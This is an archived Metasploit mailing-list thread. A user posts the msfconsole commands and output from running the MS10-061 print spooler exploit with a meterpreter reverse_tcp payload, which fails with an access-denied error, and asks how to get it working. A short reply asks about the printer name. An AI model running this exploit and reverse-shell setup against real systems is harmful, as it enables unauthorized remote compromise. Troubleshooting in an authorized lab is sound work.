Metasploit mailing list archives

Re: print spooler module exception


From: Carlos Perez <carlos_perez () darkoperator com>
Date: Tue, 5 Oct 2010 15:21:31 -0400

Did you set the Printer name?

Sent from my iPhone

On Oct 5, 2010, at 5:29 AM, 김무성 <kimms () infosec co kr> wrote:

Hello. List.

 

I try to excute MS10_061 (print spooler).

I shared Microsoft XPS Document Writer. And checked simple file share 

 

msf > use exploit/windows/smb/ms10_061_spoolss

msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_061_spoolss) > set RHOST 10.10.50.201

msf exploit(ms10_061_spoolss) > set LHOST 10.17.17.111

msf exploit(ms10_061_spoolss) > exploit

 

[*] Started reverse handler on 10.17.17.111:4444

[*] Trying target Windows Universal...

[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.10.50.201[\spoolss] ...

[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:10.10.50.201[\spoolss] ...

[*] Attempting to exploit MS10-061 via \\10.10.50.201\printers ...

[-] Exploit exception: Unable to open printer: 5

[*] Exploit completed, but no session was created.

 

There are exception num 5.

Num 5 is access deny.

But when I opened folder explorer and typed \\10.10.50.201\printers, I can show print bar window.

How can I exploit?

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread: